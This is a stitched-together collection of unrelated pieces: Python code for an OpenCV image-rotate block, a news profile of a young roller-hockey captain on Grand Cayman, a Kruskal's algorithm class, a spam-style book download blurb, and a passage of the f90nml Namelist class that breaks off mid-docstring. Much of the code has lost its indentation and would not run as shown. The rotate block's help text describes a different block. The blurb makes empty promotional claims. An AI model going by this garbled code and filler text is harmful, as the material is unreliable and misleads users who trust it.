'BackgroundColor',
'BorderColor',
'HelpView',
'prop_confirm'
]
handlers = [
'on_cancel_clicked',
'on_prop_confirm_clicked',
'on_BackColorButton_clicked',
'on_BorderColorButton_clicked'
]
top_window = 'Properties'
GladeWindow.__init__(self, filename, top_window, widget_list, handlers)
# load properties values
self.block_properties = self.m_oPropertiesXML.getTag("properties").getTag("block").getChildTags("property")
        for Property in self.block_properties:
            if Property.name == "xC":
                self.widgets['xC'].set_value(float(Property.value))
            if Property.name == "yC":
                self.widgets['yC'].set_value(float(Property.value))
            if Property.name == "isFilling":
                if Property.value == "true":
                    self.widgets['isFilling'].set_active(True)
                else:
                    self.widgets['isFilling'].set_active(False)
            if Property.name == "isScalling":
                if Property.value == "true":
                    self.widgets['isScalling'].set_active(True)
                else:
                    self.widgets['isScalling'].set_active(False)
            if Property.name == "isCenter":
                if Property.value == "true":
                    self.widgets['isAtCenter'].set_active(True)
                else:
                    self.widgets['isAtPoint'].set_active(True)
self.configure()
# load help text
# t_oS2iHelp = XMLParser(self.m_sDataDir + "help/rotate" + _("_en.help"))
# t_oTextBuffer = gtk.TextBuffer()
# t_oTextBuffer.set_text(unicode(str(t_oS2iHelp.getTag("help").getTag("content").getTagContent())))
# self.widgets['HelpView'].set_buffer(t_oTextBuffer)
#------------------------Help Text----------------------------------------------
    def getHelp(self):  # added help
        # NOTE: text translated from Portuguese; it appears to describe a
        # circle-detection block rather than this rotate block.
        return ("Detects circular shapes in the input image. Output 1 is the "
                "evaluation response (*) and output 2 shows the circles found.")
# ----------------------------------------------------------------------
def __del__(self):
pass
# ----------------------------------------------------------------------
def on_prop_confirm_clicked(self, *args):
self.widgets['prop_confirm'].grab_focus()
for Property in self.block_properties:
if Property.name == "xC":
Property.value = unicode(self.widgets['xC'].get_value())
if Property.name == "yC":
Property.value = unicode(self.widgets['yC'].get_value())
if Property.name == "isCenter":
if self.widgets['isAtCenter'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
if Property.name == "isFilling":
if self.widgets['isFilling'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
if Property.name == "isScalling":
if self.widgets['isScalling'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
self.m_oS2iBlockProperties.SetPropertiesXML(self.m_oPropertiesXML)
self.m_oS2iBlockProperties.SetBorderColor(self.m_oBorderColor)
self.m_oS2iBlockProperties.SetBackColor(self.m_oBackColor)
self.widgets['Properties'].destroy()
# ----------------------------------------------------------------------
# propProperties = Properties()()
# propProperties.show( center=0 )
# ------------------------------------------------------------------------------
# Code generation
# ------------------------------------------------------------------------------
def generate(blockTemplate):
blockTemplate.header += "#define PI 3.1415926535898\n"
blockTemplate.header += "double rads(double degs){\n"
blockTemplate.header += " return (PI/180 * degs);\n"
blockTemplate.header += "}\n\n"
for propIter in blockTemplate.properties:
if propIter[0] == 'xC':
xC = propIter[1]
elif propIter[0] == 'yC':
yC = propIter[1]
elif propIter[0] == 'isFilling':
isFilling = propIter[1]
elif propIter[0] == 'isCenter':
isCenter = propIter[1]
elif propIter[0] == 'isScalling':
isScalling = propIter[1]
blockTemplate.imagesIO = '\nIplImage * block$$_img_i1 = NULL;\n' + \
'double block$$_double_i2;\n' + \
'IplImage * block$$_img_o1 = NULL;\n'
blockTemplate.imagesIO += '\n\n'
blockTemplate.functionCall = '\n if(block$$_img_i1)\n {\n' + \
' double scale;\n int H;\n int W;\n' + \
' W = block$$_img_i1->width;\n' + \
' H = block$$_img_i1->height;\n' + \
' block$$_img_o1 = cvCreateImage(cvSize(W,H),block$$_img_i1->depth,block$$_img_i1->nChannels);\n' + \
' CvMat* mat = cvCreateMat(2,3,CV_32FC1);\n'
if isCenter == "true":
blockTemplate.functionCall += ' CvPoint2D32f center = cvPoint2D32f(W/2, H/2);\n'
else:
blockTemplate.functionCall += ' CvPoint2D32f center = cvPoint2D32f(' + str(int(float(xC))) + ',' + str(
int(float(yC))) + ');\n'
if isScalling == "true":
blockTemplate.functionCall += ' scale = H/(fabs(H*sin(rads(90-abs(block$$_double_i2)))) + fabs(W*sin(rads(abs(block$$_double_i2)))));\n' + \
' cv2DRotationMatrix(center,block$$_double_i2,scale,mat);\n'
else:
blockTemplate.functionCall += ' cv2DRotationMatrix(center,block$$_double_i2,1.0,mat);\n'
if isFilling == "true":
blockTemplate.functionCall += ' cvWarpAffine(block$$_img_i1,block$$_img_o1,mat,CV_WARP_FILL_OUTLIERS,cvScalarAll(0));\n'
else:
blockTemplate.functionCall += ' cvWarpAffine(block$$_img_i1,block$$_img_o1,mat,0,cvScalarAll(0));\n'
blockTemplate.functionCall += ' }\n'
blockTemplate.dealloc = 'cvReleaseImage(&block$$_img_o1);\n' + \
'cvReleaseImage(&block$$_img_i1);\n'
# ------------------------------------------------------------------------------
# Block Setup
# ------------------------------------------------------------------------------
def getBlock():
return {"Label": _("Rotate Image"),
"Path": {"Python": "rotate",
"Glade": "glade/rotate.ui",
"Xml": "xml/rotate.xml"},
"Icon": "images/rotate.png",
"Color": "90:5:10:150",
"InTypes": {0: "HRP_IMAGE", 1: "HRP_DOUBLE"},
"OutTypes": {0: "HRP_IMAGE"},
"Description": _("Rotates input image the input angle degrees. (More options inside)"),
"TreeGroup": _("Experimental")
}
|
Brad Galbraith is a multi-sport athlete in the Cayman Islands. He has a background in football, recently finished a youth basketball season and is now sharpening his skates for his first love: hockey.
In particular Galbraith, who turns 18 this month, is guiding a roller hockey team on Grand Cayman. The Ottawa native is team captain of the Legendz Longhorns in the Logic Adult Roller Hockey League. The competition started earlier this month and sees matches every Tuesday evening at the Logic arena of Kings Sports Centre.
Galbraith’s Longhorns are in action tonight at 9pm. The Longhorns may be a new name in local hockey but are essentially the same Barracudas squad from last year. In spite of his age, Galbraith is no stranger to the sport, having played for the last four years.
In fact the son of Heather and Greg Anderson states his expectations this season are lofty.
“I think we can win the Cherry Cup,” Galbraith said. “I’m comfortable with the team. We have Jason (Windsor) who I feel is the league’s best defender. In fact he’s one of the best defencemen I’ve ever seen. We have Jeremy Olynik returning in net.
“He is one of the best goalies out there and he had the best save percentage last year. Chris Anton is versatile in defence and Eric Lacasse is back and he was a good asset. Eric was a good scorer but more importantly he kept people away from the net on defence.
“Granted our defenceman Jeff Danter is out this season because he left the island for family reasons. I’m also worried about Mark Thompson and his back health. If he can’t play well that can be an issue.”
Among the teams that could stifle those title aspirations are perennial powers the High Rollers and ITS Cayman (formerly the Budget Beavers). The High Rollers have traditionally been the best defensive side while ITS have consistently posted gaudy offensive numbers. Even the Islanders, who overcame years of futility to win their first championship last season, are threats.
Galbraith is well aware of the changes in all of those sides and feels that the Islanders are the team to beat at the moment. “ITS have a new goalie in Randy Cannon (who plays for the Pirates in ball hockey) and he should make a difference. Last year the Beavers had a porous defence. This year they look like a better team as Randy will be hard to beat in net.
“The High Rollers are good too but the defending champion Islanders scare me the most. Mind you they now have Scott Hughes in net with Nigel Windsor out for the season with a groin injury.”
Galbraith, who is only 5ft 7in and 110lbs, has some pressure to replicate his form from last Fall.
He had his best statistical campaign and saw his club rise to a second-place spot in the standings. Even though his side fell short of a title, Galbraith has plans of outdoing himself stats-wise.
“I think my best season was the championship one last Spring. No one expected us to win and I can’t explain how good it was to win the Cup. Being a captain (for the first time) last Fall had extra responsibilities.
“I had to make tough calls and it was extra pressure. But it brings leadership out of you and I couldn’t imagine posting 33 points before the season started. It was an amazing year.” |
"""
Kruskal's algorithm
https://en.wikipedia.org/wiki/Kruskal%27s_algorithm
"""
from __future__ import print_function
class Graph(object):
""" Simple implementation of directed acyclic graph
Parameters
----------
nodes : set
set of all nodes in the graph
dependencies : list
list of tuples (weight, node1, node2) which show connection
between nodes of the graph with appropriate weight
"""
def __init__(self, nodes, dependencies):
self.nodes = nodes
self.dependencies = dependencies
self.parent = {}
self.rank = {}
def __str__(self):
""" string representation of the graph """
string = ''
for node in sorted(self.nodes):
strnode = ["{} -> {} ({})".format(start, end, w)
for w, start, end in self.dependencies if start == node]
string += "node {}: {}\n".format(node, " ".join(strnode))
return string[:-1]
def find(self, edge):
""" for current edge return parent edge """
if self.parent[edge] != edge:
self.parent[edge] = self.find(self.parent[edge])
return self.parent[edge]
def union(self, edge1, edge2):
""" union edge1 and edge2 into one tree """
root1 = self.find(edge1)
root2 = self.find(edge2)
if root1 == root2:
return
if self.rank[root1] > self.rank[root2]:
self.parent[root2] = root1
else:
self.parent[root1] = root2
if self.rank[root1] == self.rank[root2]:
self.rank[root2] += 1
def minimum_spanning_tree(self):
""" a minimum spanning tree
Returns
-------
out : set
return a set of tuples (weight, node1, node2)
with minimum spanning tree for a connected weighted graph
"""
# make_set
self.parent = {node: node for node in self.nodes}
self.rank = {node: 0 for node in self.nodes}
# sort edges
# weight should be first item in tuple
edges = self.dependencies
edges.sort()
# set initial tree
minimum_spanning_tree = set()
for weight, edge1, edge2 in edges:
if self.find(edge1) != self.find(edge2):
# union edge1 and edge2
self.union(edge1, edge2)
# add new dependence to the tree
minimum_spanning_tree.add((weight, edge1, edge2))
return minimum_spanning_tree
if __name__ == '__main__':
GRAPH_NODES = {0, 1, 2, 3, 4, 5, 6, 7}
# [(weight, node1, node2), ...]
    GRAPH_DEPENDENCIES = [(4, 0, 4), (7, 4, 2), (6, 2, 6), (8, 0, 1),
                          (3, 1, 5), (7, 5, 7), (6, 5, 6), (8, 5, 2)]
    GRAPH = Graph(GRAPH_NODES, GRAPH_DEPENDENCIES)
print("Show graph:\n{}\n".format(GRAPH))
print("Minimum spanning tree: {}".format(GRAPH.minimum_spanning_tree()))
|
Download the book Gestion de l'entreprise et comptabilité by Pierre Lassègue in PDF, or read it online in ePub/PDF/Audible/Kindle format – an easy way to stream Gestion de l'entreprise et comptabilité across multiple devices.
Gestion de l'entreprise et comptabilité was written by a best-selling author known for engaging storytelling. It was one of the most sought-after books of 2019 and contains 724 pages. The book was a pleasant surprise thanks to its top rating and excellent user reviews, so after finishing it I recommend readers not to underestimate it. Put Gestion de l'entreprise et comptabilité on your reading list – you will regret not having read it. |
"""Fortran namelist interface.
The ``Namelist`` is a representation of a Fortran namelist and its contents in
a Python environment.
:copyright: Copyright 2014 Marshall Ward, see AUTHORS for details.
:license: Apache License, Version 2.0, see LICENSE for details.
"""
from __future__ import print_function
import itertools
import copy
import numbers
import os
import platform
try:
from StringIO import StringIO # Python 2.x
except ImportError:
from io import StringIO # Python 3.x
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
try:
basestring # Python 2.x
except NameError:
basestring = str # Python 3.x
class Namelist(OrderedDict):
"""Representation of Fortran namelist in a Python environment.
Namelists can be initialised as empty or with a pre-defined `dict` of
`items`. If an explicit default start index is required for `items`, then
it can be initialised with the `default_start_index` input argument.
In addition to the standard methods supported by `dict`, several additional
methods and properties are provided for working with Fortran namelists.
"""
class RepeatValue(object):
"""Container class for output using repeat counters."""
def __init__(self, n, value):
"""Create the RepeatValue object."""
self.repeats = n
self.value = value
def __init__(self, *args, **kwds):
"""Create the Namelist object."""
s_args = list(args)
# If using (unordered) dict, then resort the keys for reproducibility
# NOTE: Python 3.7+ dicts are order-preserving.
if (args and not isinstance(args[0], OrderedDict) and
isinstance(args[0], dict)):
s_args[0] = sorted(args[0].items())
# Assign the default start index
try:
self._default_start_index = kwds.pop('default_start_index')
except KeyError:
self._default_start_index = None
super(Namelist, self).__init__(*s_args, **kwds)
# We internally track the list of cogroups (groups of the same name),
# although this could be replaced with a per-access search.
self._cogroups = []
self.start_index = self.pop('_start_index', {})
# Update the complex tuples as intrinsics
# TODO: We are effectively setting these twice. Instead, fetch these
# from s_args rather than relying on Namelist to handle the content.
if '_complex' in self:
for key in self['_complex']:
if all(isinstance(v, list) for v in self[key]):
self[key] = [complex(*v) for v in self[key]]
else:
self[key] = complex(*self[key])
self.pop('_complex')
# Formatting properties
self._column_width = 72
self._indent = 4 * ' '
self._end_comma = False
self._uppercase = False
self._float_format = ''
self._logical_repr = {False: '.false.', True: '.true.'}
self._index_spacing = False
self._repeat_counter = False
self._split_strings = False
# Namelist group spacing flag
self._newline = False
# Check for pre-set indentation
self.indent = self.pop('_indent', self.indent)
# PyPy 2 is dumb and does not use __setitem__() inside __init__()
# This loop will explicitly convert any internal dicts to Namelists.
if (platform.python_implementation() == 'PyPy' and
platform.python_version_tuple()[0] == '2'):
for key, value in self.items():
self[key] = value
def __contains__(self, key):
"""Case-insensitive interface to OrderedDict."""
return super(Namelist, self).__contains__(key.lower())
def __delitem__(self, key):
"""Case-insensitive interface to OrderedDict."""
lkey = key.lower()
if lkey in self._cogroups:
# Remove all cogroup values
cogrp = Cogroup(self, lkey)
for gkey in cogrp.keys:
super(Namelist, self).__delitem__(gkey)
self._cogroups.remove(lkey)
else:
super(Namelist, self).__delitem__(key)
def __getitem__(self, key):
"""Case-insensitive interface to OrderedDict."""
if isinstance(key, basestring):
lkey = key.lower()
if lkey in self._cogroups:
return Cogroup(self, lkey)
else:
return super(Namelist, self).__getitem__(lkey)
else:
keyiter = iter(key)
grp, var = next(keyiter).lower(), next(keyiter).lower()
return super(Namelist, self).__getitem__(grp).__getitem__(var)
def __setitem__(self, key, value):
"""Case-insensitive interface to OrderedDict.
Python dict inputs to the Namelist, such as derived types, are also
converted into Namelists.
"""
# Promote dicts to Namelists
if isinstance(value, dict) and not isinstance(value, Namelist):
value = Namelist(
value,
default_start_index=self.default_start_index
)
# Convert list of dicts to list of namelists
# (NOTE: This may be for legacy cogroup support? Can it be dropped?)
elif is_nullable_list(value, dict):
for i, v in enumerate(value):
if isinstance(v, Namelist) or v is None:
value[i] = v
else:
# value is a non-Namelist dict
value[i] = Namelist(
v,
default_start_index=self.default_start_index
)
lkey = key.lower()
super(Namelist, self).__setitem__(lkey, value)
def __str__(self):
"""Print the Fortran representation of the namelist.
Currently this can only be applied to the full contents of the namelist
        file. Individual namelist groups or values may not render correctly.
"""
output = StringIO()
if all(isinstance(v, Namelist) for v in self.values()):
self._writestream(output)
else:
print(repr(self), file=output)
nml_string = output.getvalue().rstrip()
output.close()
return nml_string
# Format configuration
@property
def column_width(self):
"""Set the maximum number of characters per line of the namelist file.
:type: ``int``
:default: 72
Tokens longer than ``column_width`` are allowed to extend past this
limit.
"""
return self._column_width
@column_width.setter
def column_width(self, width):
"""Validate and set the column width."""
if isinstance(width, int):
if width >= 0:
self._column_width = width
else:
raise ValueError('Column width must be nonnegative.')
else:
raise TypeError('Column width must be a nonnegative integer.')
@property
def default_start_index(self):
"""Set the default start index for vectors with no explicit index.
:type: ``int``, ``None``
:default: ``None``
When the `default_start_index` is set, all vectors without an explicit
start index are assumed to begin with `default_start_index`. This
index is shown when printing the namelist output.
If set to `None`, then no start index is assumed and is left as
implicit for any vectors undefined in `start_index`.
"""
return self._default_start_index
@default_start_index.setter
    def default_start_index(self, value):
        """Validate and set the default start index."""
        if value is not None and not isinstance(value, int):
            raise TypeError('default_start_index must be an integer or None.')
        self._default_start_index = value
@property
def end_comma(self):
"""Append commas to the end of namelist variable entries.
:type: ``bool``
:default: ``False``
Fortran will generally disregard any commas separating variable
assignments, and the default behaviour is to omit these commas from the
output. Enabling this flag will append commas at the end of the line
for each variable assignment.
"""
return self._end_comma
@end_comma.setter
def end_comma(self, value):
"""Validate and set the comma termination flag."""
if not isinstance(value, bool):
raise TypeError('end_comma attribute must be a logical type.')
self._end_comma = value
@property
def false_repr(self):
"""Set the string representation of logical false values.
:type: ``str``
:default: ``'.false.'``
This is equivalent to the first element of ``logical_repr``.
"""
return self._logical_repr[0]
@false_repr.setter
def false_repr(self, value):
"""Validate and set the logical false representation."""
if isinstance(value, str):
if not (value.lower().startswith('f') or
value.lower().startswith('.f')):
raise ValueError("Logical false representation must start "
"with 'F' or '.F'.")
else:
self._logical_repr[0] = value
else:
raise TypeError('Logical false representation must be a string.')
@property
def float_format(self):
"""Set the namelist floating point format.
:type: ``str``
:default: ``''``
The property sets the format string for floating point numbers,
following the format expected by the Python ``format()`` function.
"""
return self._float_format
@float_format.setter
def float_format(self, value):
"""Validate and set the upper case flag."""
if isinstance(value, str):
# Duck-test the format string; raise ValueError on fail
'{0:{1}}'.format(1.23, value)
self._float_format = value
else:
raise TypeError('Floating point format code must be a string.')
@property
def indent(self):
r"""Set the whitespace indentation of namelist entries.
:type: ``int``, ``str``
:default: ``' '`` (four spaces)
This can be set to an integer, denoting the number of spaces, or to an
explicit whitespace character, such as a tab (``\t``).
"""
return self._indent
@indent.setter
def indent(self, value):
"""Validate and set the indent width."""
# Explicit indent setting
if isinstance(value, str):
if value.isspace() or len(value) == 0:
self._indent = value
else:
raise ValueError('String indentation can only contain '
'whitespace.')
# Set indent width
elif isinstance(value, int):
if value >= 0:
self._indent = value * ' '
else:
raise ValueError('Indentation spacing must be nonnegative.')
else:
raise TypeError('Indentation must be specified by string or space '
'width.')
@property
def index_spacing(self):
"""Apply a space between indexes of multidimensional vectors.
:type: ``bool``
:default: ``False``
"""
return self._index_spacing
@index_spacing.setter
def index_spacing(self, value):
"""Validate and set the index_spacing flag."""
if not isinstance(value, bool):
raise TypeError('index_spacing attribute must be a logical type.')
self._index_spacing = value
# NOTE: This presumes that bools and ints are identical as dict keys
@property
def logical_repr(self):
"""Set the string representation of logical values.
:type: ``dict``
:default: ``{False: '.false.', True: '.true.'}``
There are multiple valid representations of True and False values in
Fortran. This property sets the preferred representation in the
namelist output.
The properties ``true_repr`` and ``false_repr`` are also provided as
interfaces to the elements of ``logical_repr``.
"""
return self._logical_repr
@logical_repr.setter
def logical_repr(self, value):
"""Set the string representation of logical values."""
if not any(isinstance(value, t) for t in (list, tuple)):
raise TypeError("Logical representation must be a tuple with "
"a valid true and false value.")
if not len(value) == 2:
raise ValueError("List must contain two values.")
self.false_repr = value[0]
self.true_repr = value[1]
@property
def repeat_counter(self):
"""Return whether the namelist uses repeat counters for arrays.
If True, then arrays with repeated values will use repeat tokens. For
example, the array ``[1, 2, 2, 2]`` will be written as ``1, 3*2``.
:type: ``bool``
:default: ``False``
"""
return self._repeat_counter
@repeat_counter.setter
def repeat_counter(self, value):
"""Set whether array output should be done in repeat form."""
if isinstance(value, bool):
self._repeat_counter = value
else:
raise TypeError(r"repeat must be of type ``bool``")
@property
def split_strings(self):
"""Split strings at the ``column_width`` over multiple lines.
:type: ``bool``
:default: ``False``
"""
return self._split_strings
@split_strings.setter
def split_strings(self, value):
"""Validate and set the split_strings flag."""
if not isinstance(value, bool):
raise TypeError('split_strings attribute must be a logical type.')
self._split_strings = value
@property
def start_index(self):
"""Set the starting index for each vector in the namelist.
:type: ``dict``
:default: ``{}``
``start_index`` is stored as a dict which contains the starting index
for each vector saved in the namelist. For the namelist ``vec.nml``
shown below,
.. code-block:: fortran
&vec_nml
a = 1, 2, 3
b(0:2) = 0, 1, 2
c(3:5) = 3, 4, 5
d(:,:) = 1, 2, 3, 4
/
the ``start_index`` contents are
.. code:: python
>>> import f90nml
>>> nml = f90nml.read('vec.nml')
>>> nml['vec_nml'].start_index
{'b': [0], 'c': [3], 'd': [None, None]}
The starting index of ``a`` is absent from ``start_index``, since its
starting index is unknown and its values cannot be assigned without
referring to the corresponding Fortran source.
"""
return self._start_index
@start_index.setter
def start_index(self, value):
"""Validate and set the vector start index."""
# TODO: Validate contents? (May want to set before adding the data.)
if not isinstance(value, dict):
raise TypeError('start_index attribute must be a dict.')
self._start_index = value
@property
def true_repr(self):
"""Set the string representation of logical true values.
:type: ``str``
        :default: ``'.true.'``
This is equivalent to the second element of ``logical_repr``.
"""
return self._logical_repr[1]
@true_repr.setter
def true_repr(self, value):
"""Validate and set the logical true representation."""
if isinstance(value, str):
if not (value.lower().startswith('t') or
value.lower().startswith('.t')):
raise ValueError("Logical true representation must start with "
"'T' or '.T'.")
else:
self._logical_repr[1] = value
else:
raise TypeError('Logical true representation must be a string.')
@property
def uppercase(self):
"""Print group and variable names in uppercase.
:type: ``bool``
:default: ``False``
        When enabled, all group and variable names are written in uppercase in
        the output.
"""
return self._uppercase
@uppercase.setter
def uppercase(self, value):
"""Validate and set the uppercase flag."""
if not isinstance(value, bool):
raise TypeError('uppercase attribute must be a logical type.')
self._uppercase = value
def write(self, nml_path, force=False, sort=False):
"""Write Namelist to a Fortran 90 namelist file.
>>> nml = f90nml.read('input.nml')
>>> nml.write('out.nml')
"""
nml_is_file = hasattr(nml_path, 'read')
if not force and not nml_is_file and os.path.isfile(nml_path):
raise IOError('File {0} already exists.'.format(nml_path))
nml_file = nml_path if nml_is_file else open(nml_path, 'w')
try:
self._writestream(nml_file, sort)
finally:
if not nml_is_file:
nml_file.close()
def patch(self, nml_patch):
"""Update the namelist from another partial or full namelist.
This is different from the intrinsic `update()` method, which replaces
a namelist section. Rather, it updates the values within a section.
"""
for sec in nml_patch:
if sec not in self:
self[sec] = Namelist()
self[sec].update(nml_patch[sec])
def add_cogroup(self, key, val):
"""Append a duplicate group to the Namelist as a new group."""
# TODO: What to do if it's a new group? Add normally?
lkey = key.lower()
assert lkey in self or lkey in self._cogroups
grps = self[lkey]
# Set up the cogroup if it does not yet exist
if isinstance(grps, Namelist):
# NOTE: We re-use the key to preserve the original order.
self._cogroups.append(lkey)
grps = [grps]
# Generate the cogroup label and add to the Namelist
# NOTE: In order to preserve ordering, we cannot reuse a key which may
# have been removed. So we always generate a new key based on the
# largest index. If no key is present, initialize with 1.
# Gather the list of existing IDs
        hdr = '_grp_{0}_'.format(lkey)
idx = [int(k.split(hdr)[1]) for k in self if k.startswith(hdr)]
try:
cogrp_id = 1 + max(idx)
except ValueError:
cogrp_id = 1
cogrp_key = '_'.join(['_grp', lkey, str(cogrp_id)])
self[cogrp_key] = val
def groups(self):
"""Return an iterator that spans values with group and variable names.
Elements of the iterator consist of a tuple containing two values. The
first is internal tuple containing the current namelist group and its
variable name. The second element of the returned tuple is the value
associated with the current group and variable.
"""
for key, value in self.items():
for inner_key, inner_value in value.items():
yield (key, inner_key), inner_value
def _writestream(self, nml_file, sort=False):
"""Output Namelist to a streamable file object."""
# Reset newline flag
self._newline = False
if sort:
sel = Namelist(sorted(self.items(), key=lambda t: t[0]))
else:
sel = self
for grp_name, grp_vars in sel.items():
# Check for repeated namelist records (saved as lists)
if isinstance(grp_vars, list):
for g_vars in grp_vars:
self._write_nmlgrp(grp_name, g_vars, nml_file, sort)
else:
self._write_nmlgrp(grp_name, grp_vars, nml_file, sort)
def _write_nmlgrp(self, grp_name, grp_vars, nml_file, sort=False):
"""Write namelist group to target file."""
if self._newline:
print(file=nml_file)
self._newline = True
# Strip metadata label for repeat groups
if grp_name.startswith('_grp_'):
grp_name = grp_name[5:].rsplit('_', 1)[0]
if self.uppercase:
grp_name = grp_name.upper()
if sort:
grp_vars = Namelist(sorted(grp_vars.items(), key=lambda t: t[0]))
print('&{0}'.format(grp_name), file=nml_file)
for v_name, v_val in grp_vars.items():
v_start = grp_vars.start_index.get(v_name, None)
for v_str in self._var_strings(v_name, v_val, v_start=v_start):
print(v_str, file=nml_file)
print('/', file=nml_file)
def _var_strings(self, v_name, v_values, v_idx=None, v_start=None):
"""Convert namelist variable to list of fixed-width strings."""
if self.uppercase:
v_name = v_name.upper()
var_strs = []
# Parse a multidimensional array
if is_nullable_list(v_values, list):
if not v_idx:
v_idx = []
i_s = v_start[::-1][len(v_idx)] if v_start else None
# FIXME: We incorrectly assume 1-based indexing if it is
# unspecified. This is necessary because our output method always
# separates the outer axes to one per line. But we cannot do this
# if we don't know the first index (which we are no longer assuming
# to be 1-based elsewhere). Unfortunately, the solution needs a
# rethink of multidimensional output.
# NOTE: Fixing this would also clean up the output of todict(),
# which is now incorrectly documenting unspecified indices as 1.
# For now, we will assume 1-based indexing here, just to keep
# things working smoothly.
if i_s is None:
i_s = 1
for idx, val in enumerate(v_values, start=i_s):
v_idx_new = v_idx + [idx]
v_strs = self._var_strings(v_name, val, v_idx=v_idx_new,
v_start=v_start)
var_strs.extend(v_strs)
# Parse derived type contents
elif isinstance(v_values, Namelist):
for f_name, f_vals in v_values.items():
v_title = '%'.join([v_name, f_name])
v_start_new = v_values.start_index.get(f_name, None)
v_strs = self._var_strings(v_title, f_vals,
v_start=v_start_new)
var_strs.extend(v_strs)
# Parse an array of derived types
elif is_nullable_list(v_values, Namelist):
if not v_idx:
v_idx = []
i_s = v_start[::-1][len(v_idx)] if v_start else 1
for idx, val in enumerate(v_values, start=i_s):
# Skip any empty elements in a list of derived types
if val is None:
continue
v_title = v_name + '({0})'.format(idx)
v_strs = self._var_strings(v_title, val)
var_strs.extend(v_strs)
else:
use_default_start_index = False
if not isinstance(v_values, list):
v_values = [v_values]
use_default_start_index = False
else:
use_default_start_index = self.default_start_index is not None
# Print the index range
# TODO: Include a check for len(v_values) to determine if vector
if v_idx or v_start or use_default_start_index:
v_idx_repr = '('
if v_start or use_default_start_index:
if v_start:
i_s = v_start[0]
else:
i_s = self.default_start_index
if i_s is None:
v_idx_repr += ':'
else:
i_e = i_s + len(v_values) - 1
if i_s == i_e:
v_idx_repr += '{0}'.format(i_s)
else:
v_idx_repr += '{0}:{1}'.format(i_s, i_e)
else:
v_idx_repr += ':'
if v_idx:
idx_delim = ', ' if self._index_spacing else ','
v_idx_repr += idx_delim
v_idx_repr += idx_delim.join(str(i) for i in v_idx[::-1])
v_idx_repr += ')'
else:
v_idx_repr = ''
# Split output across multiple lines (if necessary)
v_header = self.indent + v_name + v_idx_repr + ' = '
val_strs = []
val_line = v_header
if self._repeat_counter:
v_values = list(
self.RepeatValue(len(list(x)), val)
for val, x in itertools.groupby(v_values)
)
for i_val, v_val in enumerate(v_values):
# Increase column width if the header exceeds this value
if len(v_header) >= self.column_width:
column_width = len(v_header) + 1
else:
column_width = self.column_width
if len(val_line) < column_width:
# NOTE: We allow non-strings to extend past the column
# limit, but strings will be split as needed.
v_str = self._f90repr(v_val)
# Set a comma placeholder if needed
if i_val < len(v_values) - 1 or self.end_comma:
v_comma = ', '
else:
v_comma = ''
if self.split_strings and isinstance(v_val, str):
idx = column_width - len(val_line + v_comma.rstrip())
# Split the line along idx until we either exceed the
# column width, or read the end of the string.
v_l, v_r = v_str[:idx], v_str[idx:]
if v_r:
# Check if string can fit on the next line
new_val_line = (
' ' * len(v_header) + v_str + v_comma
)
if len(new_val_line.rstrip()) <= column_width:
val_strs.append(val_line)
val_line = ' ' * len(v_header)
else:
# Split string across multiple lines
while v_r:
val_line += v_l
val_strs.append(val_line)
val_line = ''
idx = column_width - len(v_comma.rstrip())
v_l, v_r = v_r[:idx], v_r[idx:]
v_str = v_l
val_line += v_str + v_comma
# Line break
if len(val_line) >= column_width:
# Append current line to list of lines
val_strs.append(val_line.rstrip())
# Start new line with space corresponding to header
val_line = ' ' * len(v_header)
# Append any remaining values
if val_line and not val_line.isspace():
val_strs.append(val_line.rstrip())
# Final null values must always precede a comma
if val_strs and v_values[-1] is None:
# NOTE: val_strs has been rstrip-ed so lead with a space
val_strs[-1] += ' ,'
# Complete the set of values
if val_strs:
var_strs.extend(val_strs)
return var_strs
def todict(self, complex_tuple=False):
"""Return a dict equivalent to the namelist.
Since Fortran variables and names cannot start with the ``_``
character, any keys starting with this token denote metadata, such as
starting index.
The ``complex_tuple`` flag is used to convert complex data into an
equivalent 2-tuple, with metadata stored to flag the variable as
complex. This is primarily used to facilitate the storage of the
namelist into an equivalent format which does not support complex
numbers, such as JSON or YAML.
"""
# TODO: Preserve ordering
nmldict = OrderedDict(self)
# Search for namelists within the namelist
# TODO: Move repeated stuff to new functions
for key, value in self.items():
if isinstance(value, Namelist):
nml = copy.deepcopy(value)
nmldict[key] = nml.todict(complex_tuple)
elif isinstance(value, complex) and complex_tuple:
nmldict[key] = [value.real, value.imag]
try:
nmldict['_complex'].append(key)
except KeyError:
nmldict['_complex'] = [key]
elif isinstance(value, list):
complex_list = False
for idx, entry in enumerate(value):
if isinstance(entry, Namelist):
nml = copy.deepcopy(entry)
nmldict[key][idx] = nml.todict(complex_tuple)
elif isinstance(entry, complex) and complex_tuple:
nmldict[key][idx] = [entry.real, entry.imag]
complex_list = True
if complex_list:
try:
nmldict['_complex'].append(key)
except KeyError:
nmldict['_complex'] = [key]
# Append the start index if present
if self.start_index:
nmldict['_start_index'] = self.start_index
return nmldict
def _f90repr(self, value):
"""Convert primitive Python types to equivalent Fortran strings."""
if isinstance(value, self.RepeatValue):
return self._f90repeat(value)
elif isinstance(value, bool):
return self._f90bool(value)
elif isinstance(value, numbers.Integral):
return self._f90int(value)
elif isinstance(value, numbers.Real):
return self._f90float(value)
elif isinstance(value, numbers.Complex):
return self._f90complex(value)
elif isinstance(value, basestring):
return self._f90str(value)
elif value is None:
return ''
else:
raise ValueError('Type {0} of {1} cannot be converted to a Fortran'
' type.'.format(type(value), value))
def _f90repeat(self, value):
"""Return a Fortran 90 representation of a repeated value."""
if value.repeats == 1:
return self._f90repr(value.value)
else:
return "{0}*{1}".format(value.repeats,
self._f90repr(value.value))
def _f90bool(self, value):
"""Return a Fortran 90 representation of a logical value."""
return self.logical_repr[value]
def _f90int(self, value):
"""Return a Fortran 90 representation of an integer."""
return str(value)
def _f90float(self, value):
"""Return a Fortran 90 representation of a floating point number."""
return '{0:{fmt}}'.format(value, fmt=self.float_format)
def _f90complex(self, value):
"""Return a Fortran 90 representation of a complex number."""
return '({0:{fmt}}, {1:{fmt}})'.format(value.real, value.imag,
fmt=self.float_format)
def _f90str(self, value):
"""Return a Fortran 90 representation of a string."""
# Replace Python quote escape sequence with Fortran
result = repr(str(value)).replace("\\'", "''").replace('\\"', '""')
# Un-escape the Python backslash escape sequence
result = result.replace('\\\\', '\\')
return result
# TODO: Move to separate file? What about ref to Namelist?
class Cogroup(list):
"""List of Namelist groups which share a common key.
Although Namelists are organized as associative arrays, access is
typically through a serial I/O data stream. One consequence is that a
